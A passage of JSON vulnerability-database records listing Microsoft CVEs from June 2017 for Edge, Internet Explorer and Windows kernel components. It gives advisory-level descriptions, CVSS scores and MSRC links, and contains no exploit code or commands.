"mscve", "title": "CVE-2017-8555", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-8555", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8555", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8555", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8532", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8532", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8532", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how affected Microsoft Edge handles different-origin requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8530", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8530", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8530", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. The attacker could also take advantage of compromised websites, or websites that accept or host user-provided content or advertisements, by adding specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8547", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8547", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8547", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nAn authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8553", "CVE-2017-8529"], "modified": 
"2017-06-27T07:00:00", "id": "MS:CVE-2017-8553", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8553", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8466", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8466", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8466", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An elevation of privilege vulnerability exists when Windows Secure Kernel Mode fails to properly handle objects in memory.\n\nTo exploit the vulnerability, a locally-authenticated attacker could attempt to run a specially crafted application on a targeted system. An attacker who successfully exploited the vulnerability could violate virtual trust levels (VTL).\n\nThe security update addresses the vulnerability by correcting how Windows handles objects in memory to properly enforce VTLs.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8494", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": 
"MS:CVE-2017-8494", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8494", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege exists in Windows when a DCOM object in Helppane.exe, configured to run as the interactive user, fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session.\n\nTo exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability after another user logged on to the same system via Terminal Services or Fast User Switching.\n\nThe update addresses the vulnerability by correcting how Helppane.exe authenticates the client.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows COM Session Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0298", "CVE-2017-8529"], "modified": 
"2017-06-27T07:00:00", "id": "MS:CVE-2017-0298", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0298", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0287", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0287", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0287", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8499", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8499", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists in Microsoft Edge that allows JavaScript XML DOM objects to detect installed browser extensions.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a malicious website in an attempt to make a user visit it. 
However, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nAn attacker who successfully exploited the vulnerability could potentially read data not intended to be disclosed. Note that the vulnerability would not allow an attacker to either execute code or elevate a user\u2019s rights directly, but the vulnerability could be used to obtain information in an attempt to further compromise the affected system.\n\nThe security update addresses the vulnerability by restricting what information is returned to Microsoft Edge by affected JavaScript object methods.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8498", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8498", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8498", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2017-8529", "CVE-2017-0289"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0289", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0289", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8549", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8549", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8549", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8521", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8521", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8521", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0288", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0288", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0288", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": 